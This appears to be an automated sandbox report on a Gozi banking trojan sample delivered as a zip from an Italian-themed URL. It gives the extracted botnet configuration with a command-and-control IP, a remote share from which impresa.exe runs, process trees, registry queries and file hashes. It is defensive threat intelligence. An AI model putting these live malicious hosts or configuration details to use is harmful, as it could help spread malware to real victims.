gozi | hxxp://evolve-adv[.]com/impresa/Documenti[.]zip

Analysis

max time kernel
271s
max time network
283s
platform
windows10-2004_x64
resource
win10v2004-20230915-it
resource tags

arch:x64arch:x86image:win10v2004-20230915-itlocale:it-itos:windows10-2004-x64systemwindows
submitted
11-10-2023 00:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://evolve-adv.com/impresa/Documenti.zip

Score

10^/10

gozi 5050 banker isfb trojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

45.93.139.24

Attributes

base_path
/jerry/
build
250260
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exemsedge.exe

pid process

3300 msedge.exe
3300 msedge.exe
412 msedge.exe
412 msedge.exe
2348 identity_helper.exe
2348 identity_helper.exe
2388 msedge.exe
2388 msedge.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

Processes:

msedge.exe

pid process

412 msedge.exe
412 msedge.exe
412 msedge.exe
412 msedge.exe
412 msedge.exe
412 msedge.exe
412 msedge.exe

pid	process
3300	msedge.exe
3300	msedge.exe
412	msedge.exe
412	msedge.exe
2348	identity_helper.exe
2348	identity_helper.exe
2388	msedge.exe
2388	msedge.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

7zG.exe

description	pid	process
Token: SeRestorePrivilege	4132	7zG.exe
Token: 35	4132	7zG.exe
Token: SeSecurityPrivilege	4132	7zG.exe
Token: SeSecurityPrivilege	4132	7zG.exe

Suspicious use of FindShellTrayWindow 35 IoCs

Processes:

msedge.exe7zG.exe

pid	process
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
4132	7zG.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

msedge.exe

pid	process
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe
412	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 412 wrote to memory of 4920	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 4920	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2704	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2704	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2704	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2704	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2704	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2704	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2704	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2704	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2704	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2704	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2704	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2704	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2704	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2704	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2704	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2704	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2704	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2704	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2704	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2704	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2704	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2704	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2704	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2704	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2704	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2704	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2704	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2704	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2704	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2704	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2704	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2704	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2704	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2704	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2704	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2704	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2704	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2704	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2704	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2704	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 3300	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 3300	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2040	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2040	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2040	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2040	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2040	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2040	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2040	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2040	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2040	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2040	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2040	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2040	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2040	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2040	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2040	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2040	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2040	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2040	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2040	412	msedge.exe	msedge.exe
PID 412 wrote to memory of 2040	412	msedge.exe	msedge.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa332546f8,0x7ffa33254708,0x7ffa33254718
1⤵
PID:4920

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://evolve-adv.com/impresa/Documenti.zip
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:412

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2232,9832876669032911678,4598642814083755953,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2244 /prefetch:2
2⤵
PID:2704

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2232,9832876669032911678,4598642814083755953,131072 --lang=it --service-sandbox-type=utility --mojo-platform-channel-handle=2876 /prefetch:8
2⤵
PID:2040

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2232,9832876669032911678,4598642814083755953,131072 --lang=it --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:3
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3300

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,9832876669032911678,4598642814083755953,131072 --lang=it --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
2⤵
PID:2604

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,9832876669032911678,4598642814083755953,131072 --lang=it --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
2⤵
PID:2524

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2232,9832876669032911678,4598642814083755953,131072 --lang=it --service-sandbox-type=none --mojo-platform-channel-handle=4956 /prefetch:8
2⤵
PID:4316

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2232,9832876669032911678,4598642814083755953,131072 --lang=it --service-sandbox-type=none --mojo-platform-channel-handle=4956 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2348

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,9832876669032911678,4598642814083755953,131072 --lang=it --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5012 /prefetch:1
2⤵
PID:2456

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,9832876669032911678,4598642814083755953,131072 --lang=it --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:1
2⤵
PID:1548

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,9832876669032911678,4598642814083755953,131072 --lang=it --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3908 /prefetch:1
2⤵
PID:4836

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,9832876669032911678,4598642814083755953,131072 --lang=it --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4604 /prefetch:1
2⤵
PID:2432

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2232,9832876669032911678,4598642814083755953,131072 --lang=it --service-sandbox-type=collections --mojo-platform-channel-handle=5724 /prefetch:8
2⤵
PID:4216

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2232,9832876669032911678,4598642814083755953,131072 --lang=it --service-sandbox-type=none --mojo-platform-channel-handle=6028 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2388

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,9832876669032911678,4598642814083755953,131072 --lang=it --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5776 /prefetch:1
2⤵
PID:3728

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2000

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1128

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1728

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Documenti\" -spe -an -ai#7zMap12235:80:7zEvent30928
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4132

\??\UNC\62.173.146.72\scarica\impresa.exe
"\\62.173.146.72\scarica\impresa.exe"
1⤵
PID:3196

\??\UNC\62.173.146.72\scarica\impresa.exe
"\\62.173.146.72\scarica\impresa.exe"
1⤵
PID:1248

C:\Windows\system32\rundll32.exe
C:\Windows\system32\rundll32.exe C:\Windows\system32\PcaSvc.dll,PcaPatchSdbTask
1⤵
PID:4204

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
4d25fc6e43a16159ebfd161f28e16ef7

SHA1
49941a4bc3ed1ef90c7bcf1a8f0731c6a68facb4

SHA256
cee74fad9d775323a5843d9e55c770314e8b58ec08653c7b2ce8e8049df42bb5

SHA512
ea598fb8bfe15c777daeb025da98674fe8652f7341e5d150d188c46744fce11c4d20d1686d185039c5025c9a4252d1585686b1c3a4df4252e69675aaf37edfc1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
5KB

MD5
5ee95f8a2bab47180420b70a0f23671e

SHA1
46092184749d3a449f33c3a8c105eab07144d295

SHA256
ad403df4029ce2b29658e3c1458984bae1a45492477faeb63993ba26bf50643c

SHA512
27fe100bd147e646db41177c803443248f8cb9bb71ec6158b0f7550097e408068045e93214bf4d5044c189aeea51a0558db3e2d27993aed40e1cd96ee55bded0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
5KB

MD5
79a11c530a25770b7540a258c531f1c0

SHA1
bff976362d3de3331cc303613a13d358cf658027

SHA256
e85a4d315548d0fefdba5dfbcfc076db3a0bafb63f9318fe05afc836353e3f5a

SHA512
828eaa0007bad51ad26e3cbe507909fa942ce39f114d8de12a608fdc248b369986774a2ffaee939a418637cdb0457456224800ef8867e4cdf459f75179d34191

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
9760feeb2e2785701260e8a2b98c3aba

SHA1
8adae405dd683a617c567e70072141a31949e193

SHA256
905e1a7a0317dd854d4a824462a758483824ab446a619d8fd9ea3b6c4d8a9595

SHA512
8ee8e17943afdbf6a313c06db58377eb4538ae3ab664a8a21bd2078d208b1c43f26a48f44719eca55ffb4a9454df7c2ad85d424b21c8c6efee886fea6daea303

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
Filesize
24KB

MD5
d555d038867542dfb2fb0575a0d3174e

SHA1
1a5868d6df0b5de26cf3fc7310b628ce0a3726f0

SHA256
044cac379dddf0c21b8e7ee4079d21c67e28795d14e678dbf3e35900f25a1e2e

SHA512
d8220966fe6c3ae4499bc95ab3aead087a3dd915853320648849d2fc123a4acd157b7dba64af0108802522575a822651ecc005523c731423d9131ee679c2712f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
12KB

MD5
c297e90cb21c339ce2ec95f0346cd7ed

SHA1
6c4d7b47d51d387d71d4ec015244d464bd4060af

SHA256
f0e95b6bec1fe2f80ace11eb9ca2ef71497418c12111069aab6fe2764da0719b

SHA512
d948348c5cada1124c3b1f5967d6801cd5c70cb45d02274c93a22c129433554854b1c8ead7b054e8f33c5c02f8bc7580c9f547805a9487b0a4718de6d5b6a553

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
10KB

MD5
0bf7c36814280dec53ec4dda48b59bd0

SHA1
d6d6e4cb0c3752afe96984aef805e014ad141692

SHA256
c1cd2cc7a8fed7cf0257cbc40240c0941f52079b2425043083767ac411d0cd70

SHA512
f77932e7a0b2fb2347ce33ee3ac08d9ad4d1e90d7d3c0386dd9b32dfa678aa0cf4e23b191a938f115c26f898897a4793e3418c7b642eb7244abb53c11e90db77

Download Submit
C:\Users\Admin\Downloads\Documenti.zip
Filesize
326B

MD5
902f6266e8e0b95c2801839ecd926a29

SHA1
989ec5b1787b96a81f8535df4e0f8debcbdc8132

SHA256
a43f7e57a2a6e00480baf95d1e9c82332796fbb4b4873046bd1ac9bca4f68075

SHA512
99892a65bf036d927970a8cf3377d62681771052ae296c08f003f977f30883fdc14d9c8c0726d037f5e340d3fed2a7d918e2ee7545a66219e4569769709206e0

Download Submit
\??\pipe\LOCAL\crashpad_412_CMJHPWBCJNEQMYWE
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/1248-222-0x0000000000400000-0x0000000002287000-memory.dmp

Filesize
30.5MB

Download
memory/1248-212-0x0000000002320000-0x000000000232B000-memory.dmp

Filesize
44KB

Download
memory/1248-213-0x0000000000400000-0x0000000002287000-memory.dmp

Filesize
30.5MB

Download
memory/1248-214-0x0000000002350000-0x0000000002450000-memory.dmp

Filesize
1024KB

Download
memory/1248-216-0x0000000003EC0000-0x0000000003ECD000-memory.dmp

Filesize
52KB

Download
memory/1248-225-0x0000000002350000-0x0000000002450000-memory.dmp

Filesize
1024KB

Download
memory/3196-211-0x0000000000400000-0x0000000002287000-memory.dmp

Filesize
30.5MB

Download
memory/3196-215-0x0000000000400000-0x0000000002287000-memory.dmp

Filesize
30.5MB

Download
memory/3196-217-0x0000000002450000-0x000000000245D000-memory.dmp

Filesize
52KB

Download
memory/3196-209-0x00000000024C0000-0x00000000025C0000-memory.dmp

Filesize
1024KB

Download
memory/3196-223-0x00000000024C0000-0x00000000025C0000-memory.dmp

Filesize
1024KB

Download
memory/3196-224-0x0000000000400000-0x0000000002287000-memory.dmp

Filesize
30.5MB

Download